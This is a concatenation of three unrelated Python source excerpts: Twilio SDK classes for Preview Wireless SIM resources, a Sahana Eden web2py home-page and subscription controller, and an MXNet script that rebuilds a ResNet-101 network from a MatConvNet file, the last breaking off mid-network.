:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode friendly_name: The friendly_name
:param unicode rate_plan: The rate_plan
:param unicode status: The status
:param unicode commands_callback_method: The commands_callback_method
:param unicode commands_callback_url: The commands_callback_url
:param unicode sms_fallback_method: The sms_fallback_method
:param unicode sms_fallback_url: The sms_fallback_url
:param unicode sms_method: The sms_method
:param unicode sms_url: The sms_url
:param unicode voice_fallback_method: The voice_fallback_method
:param unicode voice_fallback_url: The voice_fallback_url
:param unicode voice_method: The voice_method
:param unicode voice_url: The voice_url
:returns: Updated SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
data = values.of({
'UniqueName': unique_name,
'CallbackMethod': callback_method,
'CallbackUrl': callback_url,
'FriendlyName': friendly_name,
'RatePlan': rate_plan,
'Status': status,
'CommandsCallbackMethod': commands_callback_method,
'CommandsCallbackUrl': commands_callback_url,
'SmsFallbackMethod': sms_fallback_method,
'SmsFallbackUrl': sms_fallback_url,
'SmsMethod': sms_method,
'SmsUrl': sms_url,
'VoiceFallbackMethod': voice_fallback_method,
'VoiceFallbackUrl': voice_fallback_url,
'VoiceMethod': voice_method,
'VoiceUrl': voice_url,
})
payload = self._version.update(
'POST',
self._uri,
data=data,
)
return SimInstance(self._version, payload, sid=self._solution['sid'], )
@property
def usage(self):
"""
Access the usage
:returns: twilio.rest.preview.wireless.sim.usage.UsageList
:rtype: twilio.rest.preview.wireless.sim.usage.UsageList
"""
if self._usage is None:
self._usage = UsageList(self._version, sim_sid=self._solution['sid'], )
return self._usage
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.SimContext {}>'.format(context)
class SimInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload, sid=None):
"""
Initialize the SimInstance
:returns: twilio.rest.preview.wireless.sim.SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
super(SimInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'account_sid': payload.get('account_sid'),
'rate_plan_sid': payload.get('rate_plan_sid'),
'friendly_name': payload.get('friendly_name'),
'iccid': payload.get('iccid'),
'e_id': payload.get('e_id'),
'status': payload.get('status'),
'commands_callback_url': payload.get('commands_callback_url'),
'commands_callback_method': payload.get('commands_callback_method'),
'sms_fallback_method': payload.get('sms_fallback_method'),
'sms_fallback_url': payload.get('sms_fallback_url'),
'sms_method': payload.get('sms_method'),
'sms_url': payload.get('sms_url'),
'voice_fallback_method': payload.get('voice_fallback_method'),
'voice_fallback_url': payload.get('voice_fallback_url'),
'voice_method': payload.get('voice_method'),
'voice_url': payload.get('voice_url'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
'links': payload.get('links'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: SimContext for this SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
if self._context is None:
self._context = SimContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: The unique_name
:rtype: unicode
"""
return self._properties['unique_name']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def rate_plan_sid(self):
"""
:returns: The rate_plan_sid
:rtype: unicode
"""
return self._properties['rate_plan_sid']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def iccid(self):
"""
:returns: The iccid
:rtype: unicode
"""
return self._properties['iccid']
@property
def e_id(self):
"""
:returns: The e_id
:rtype: unicode
"""
return self._properties['e_id']
@property
def status(self):
"""
:returns: The status
:rtype: unicode
"""
return self._properties['status']
@property
def commands_callback_url(self):
"""
:returns: The commands_callback_url
:rtype: unicode
"""
return self._properties['commands_callback_url']
@property
def commands_callback_method(self):
"""
:returns: The commands_callback_method
:rtype: unicode
"""
return self._properties['commands_callback_method']
@property
def sms_fallback_method(self):
"""
:returns: The sms_fallback_method
:rtype: unicode
"""
return self._properties['sms_fallback_method']
@property
def sms_fallback_url(self):
"""
:returns: The sms_fallback_url
:rtype: unicode
"""
return self._properties['sms_fallback_url']
@property
def sms_method(self):
"""
:returns: The sms_method
:rtype: unicode
"""
return self._properties['sms_method']
@property
def sms_url(self):
"""
:returns: The sms_url
:rtype: unicode
"""
return self._properties['sms_url']
@property
def voice_fallback_method(self):
"""
:returns: The voice_fallback_method
:rtype: unicode
"""
return self._properties['voice_fallback_method']
@property
def voice_fallback_url(self):
"""
:returns: The voice_fallback_url
:rtype: unicode
"""
return self._properties['voice_fallback_url']
@property
def voice_method(self):
"""
:returns: The voice_method
:rtype: unicode
"""
return self._properties['voice_method']
@property
def voice_url(self):
"""
:returns: The voice_url
:rtype: unicode
"""
return self._properties['voice_url']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
@property
def links(self):
"""
:returns: The links
:rtype: unicode
"""
return self._properties['links']
def fetch(self):
"""
Fetch a SimInstance
:returns: Fetched SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, callback_method=values.unset,
callback_url=values.unset, friendly_name=values.unset,
rate_plan=values.unset, status=values.unset,
commands_callback_method=values.unset,
commands_callback_url=values.unset, sms_fallback_method=values.unset,
sms_fallback_url=values.unset, sms_method=values.unset,
sms_url=values.unset, voice_fallback_method=values.unset,
voice_fallback_url=values.unset, voice_method=values.unset,
voice_url=values.unset):
"""
Update the SimInstance
:param unicode unique_name: The unique_name
:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode friendly_name: The friendly_name
:param unicode rate_plan: The rate_plan
:param unicode status: The status
:param unicode commands_callback_method: The commands_callback_method
:param unicode commands_callback_url: The commands_callback_url
:param unicode sms_fallback_method: The sms_fallback_method
:param unicode sms_fallback_url: The sms_fallback_url
:param unicode sms_method: The sms_method
:param unicode sms_url: The sms_url
:param unicode voice_fallback_method: The voice_fallback_method
:param unicode voice_fallback_url: The voice_fallback_url
:param unicode voice_method: The voice_method
:param unicode voice_url: The voice_url
:returns: Updated SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return self._proxy.update(
unique_name=unique_name,
callback_method=callback_method,
callback_url=callback_url,
friendly_name=friendly_name,
rate_plan=rate_plan,
status=status,
commands_callback_method=commands_callback_method,
commands_callback_url=commands_callback_url,
sms_fallback_method=sms_fallback_method,
sms_fallback_url=sms_fallback_url,
sms_method=sms_method,
sms_url=sms_url,
voice_fallback_method=voice_fallback_method,
voice_fallback_url=voice_fallback_url,
voice_method=voice_method,
voice_url=voice_url,
)
@property
def usage(self):
"""
Access the usage
:returns: twilio.rest.preview.wireless.sim.usage.UsageList
:rtype: twilio.rest.preview.wireless.sim.usage.UsageList
"""
return self._proxy.usage
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.SimInstance {}>'.format(context)
|
|
# -*- coding: utf-8 -*-
import json
from os import path
from gluon import current, URL
from gluon.html import *
from gluon.storage import Storage
from gluon.sqlhtml import SQLFORM
from s3 import S3FilterForm, S3CustomController, S3OptionsFilter, S3Request, \
S3SQLCustomForm
THEME = "historic.SSF"
# =============================================================================
class index(S3CustomController):
""" Custom Home Page """
def __call__(self):
response = current.response
settings = current.deployment_settings
request = current.request
s3 = response.s3
db = current.db
s3db = current.s3db
T = current.T
output = {}
output["title"] = response.title = current.deployment_settings.get_system_name()
view = path.join(current.request.folder, "modules", "templates",
THEME, "views", "index.html")
try:
# Pass view as file not str to work in compiled mode
response.view = open(view, "rb")
except IOError:
from gluon.http import HTTP
raise HTTP(404, "Unable to open Custom View: %s" % view)
project_url = URL(c="project", f="location", extension="geojson")
project_url = "%s?~.project_id$sector.name=Deployment" % project_url
contributor_url = URL(c="pr", f="person", extension="geojson")
# Set the marker
mtable = s3db.gis_marker
query = (mtable.name == "sunflower") | (mtable.name == "contributor")
markers = db(query).select(mtable.name,
mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 2)
)
project_marker = None
contributor_marker = None
for marker in markers:
if marker.name == "sunflower":
project_marker = marker
if marker.name == "contributor":
contributor_marker = marker
layers = [{"name" : T("Deployments"),
"id" : "deployments",
"tablename" : "project_location",
"url" : project_url,
"active" : True,
"marker" : project_marker,
},
{"name" : T("Contributors"),
"id" : "contributors",
"tablename" : "pr_address",
"url" : contributor_url,
"active" : True,
"marker" : contributor_marker,
},
]
output["map"] = current.gis.show_map(collapsed = True,
feature_resources = layers,
legend="float",
)
s3.scripts.append("http://www.google.com/jsapi?key=notsupplied-wizard")
feed_control = "".join(('''
function LoadFeeds(){
var feeds=[
{title:'Tasks',
url:\'''', settings.get_base_public_url(), '''/''', request.application, '''/project/task.rss?task.status=2,3,4,11'
},
{title:'Tickets',
url:'http://eden.sahanafoundation.org/timeline?ticket=on&changeset=on&milestone=on&max=50&daysback=90&format=rss'
},
{title:'Wiki',
url:'http://eden.sahanafoundation.org/timeline?changeset=on&milestone=on&wiki=on&max=50&daysback=90&format=rss'
},
{title:'Github',
url:'https://github.com/flavour/eden/commits/master.atom'
},
{title:'Twitter',
url:'http://www.rssitfor.me/getrss?name=@SahanaFOSS'
},
{title:'Blog',
url:'http://sahanafoundation.org/feed/?cat=33,39'
}
];
var feedControl = new google.feeds.FeedControl();
// Add feeds.
for(i=0; i<feeds.length; i++){
feedControl.addFeed(feeds[i].url, feeds[i].title);
}
feedControl.setNumEntries(5);
feedControl.draw(document.getElementById("feed-control"),
{
drawMethod: 'content',
drawMode : google.feeds.FeedControl.DRAW_MODE_TABBED
});
// Initialise feed-url input
$('#feed-url').attr('href', feeds[0].url);
$('#feed-url').attr('title', feeds[0].title);
// Show feed-url
$('.gfc-tabHeader').click(feeds, function(){
activeTab = $('.gfc-tabhActive').html();
for(i=0; i<feeds.length; i++){
if(feeds[i].title == activeTab){
$('#feed-url').attr('href', feeds[i].url);
$('#feed-url').attr('title', feeds[i].title);
break;
}
}
});
}
google.load('feeds','1')
google.setOnLoadCallback(LoadFeeds)'''))
s3.js_global.append(feed_control)
return output
# =============================================================================
class subscriptions(S3CustomController):
"""
Custom page to configure Subscription settings
"""
def __call__(self):
"""
Main entry point, configuration
"""
T = current.T
auth = current.auth
# Must be logged in
if not auth.s3_logged_in():
auth.permission.fail()
form = self.create_form()
if form:
output = {"title": T("Subscription Settings"),
"form": form}
else:
output = {"title": T("No Subscriptions")}
# View
self._view(THEME, "subscriptions.html")
return output
def create_form(self):
"""
Build form for subscription settings
"""
T = current.T
db = current.db
response = current.response
user = current.auth.user.pe_id
stable = current.s3db.pr_subscription
formstyle = current.deployment_settings.get_ui_formstyle()
query = (stable.pe_id == user) & \
(stable.deleted != True)
row = db(query).select(stable.id,
stable.frequency,
stable.email_format,
limitby=(0, 1))
messages = Storage(
ERROR = T("Error: could not update subscription settings"),
SUCCESS = T("Settings updated"),
)
if row:
# Subscription exists, build form
freq_field = stable.frequency
format_field = stable.email_format
freq_field.default = row[0].frequency
format_field.default = row[0].email_format
form = SQLFORM.factory(freq_field,
format_field,
formstyle = formstyle)
if form.accepts(current.request.post_vars,
current.session,
keepvalues=True):
formvars = form.vars
from templates.SSF.config import TaskSubscriptions
sub = TaskSubscriptions()
sub.subscription["frequency"] = formvars.frequency
sub.subscription["email_format"] = formvars.email_format
if sub.update_subscription():
response.confirmation = messages.SUCCESS
else:
response.error = messages.ERROR
return form
else:
return None
# =============================================================================
|
|
# coding: utf-8
# In[62]:
import mxnet as mx
import numpy as np
import scipy.io as sio
# In[63]:
symbol_string = "import mxnet as mx\ndata= mx.symbol.Variable(name='data')\n"
# In[64]:
matpath='./hr_res101.mat'
# In[65]:
f = sio.loadmat(matpath)
net = f['net']
# In[66]:
data = mx.symbol.Variable(name='data')
conv1 = mx.symbol.Convolution(name='conv1', data=data , num_filter=64, pad=(3, 3), kernel=(7,7), stride=(2,2), no_bias=True)
# Turn cudnn off in all batchnorm layer as the cudnn does not support eps <= 0.00001
bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
conv1_relu = mx.symbol.Activation(name='conv1_relu', data=bn_conv1 , act_type='relu')
# pad right and bottom as the origin matconvnet implementation
conv1_relu_padded = mx.symbol.pad(name='conv1_relu_padded', data=conv1_relu, mode='constant', constant_value=0, pad_width=(0,0,0,0,0,1,0,1))
# pool in matconvnet use 'valid' mode but not 'full'
pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu_padded , pooling_convention='valid', pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
# another choice to deal with the matconvnet's right and bottom padding
# pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu , pooling_convention='full', pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1 , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1 , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=bn2a_branch2a , act_type='relu')
res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=bn2a_branch2b , act_type='relu')
res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a = mx.symbol.broadcast_add(name='res2a', *[bn2a_branch1,bn2a_branch2c] )
res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a , act_type='relu')
res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=bn2b_branch2a , act_type='relu')
res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=bn2b_branch2b , act_type='relu')
res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu,bn2b_branch2c] )
res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b , act_type='relu')
res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=bn2c_branch2a , act_type='relu')
res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=bn2c_branch2b , act_type='relu')
res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu,bn2c_branch2c] )
res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c , act_type='relu')
res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=bn3a_branch2a , act_type='relu')
res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=bn3a_branch2b , act_type='relu')
res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', data=res3a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a = mx.symbol.broadcast_add(name='res3a', *[bn3a_branch1,bn3a_branch2c] )
res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a , act_type='relu')
res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=bn3b1_branch2a , act_type='relu')
res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=bn3b1_branch2b , act_type='relu')
res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu,bn3b1_branch2c] )
res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1 , act_type='relu')
res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=bn3b2_branch2a , act_type='relu')
res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=bn3b2_branch2b , act_type='relu')
res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu,bn3b2_branch2c] )
res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2 , act_type='relu')
res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=bn3b3_branch2a , act_type='relu')
res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', data=res3b3_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=bn3b3_branch2b , act_type='relu')
res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu,bn3b3_branch2c] )
res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3 , act_type='relu')
res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=bn4a_branch2a , act_type='relu')
res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=bn4a_branch2b , act_type='relu')
res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a = mx.symbol.broadcast_add(name='res4a', *[bn4a_branch1,bn4a_branch2c] )
res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a , act_type='relu')
res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=bn4b1_branch2a , act_type='relu')
res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=bn4b1_branch2b , act_type='relu')
res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu,bn4b1_branch2c] )
res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1 , act_type='relu')
res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=bn4b2_branch2a , act_type='relu')
res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=bn4b2_branch2b , act_type='relu')
res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu,bn4b2_branch2c] )
res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2 , act_type='relu')
res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=bn4b3_branch2a , act_type='relu')
res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
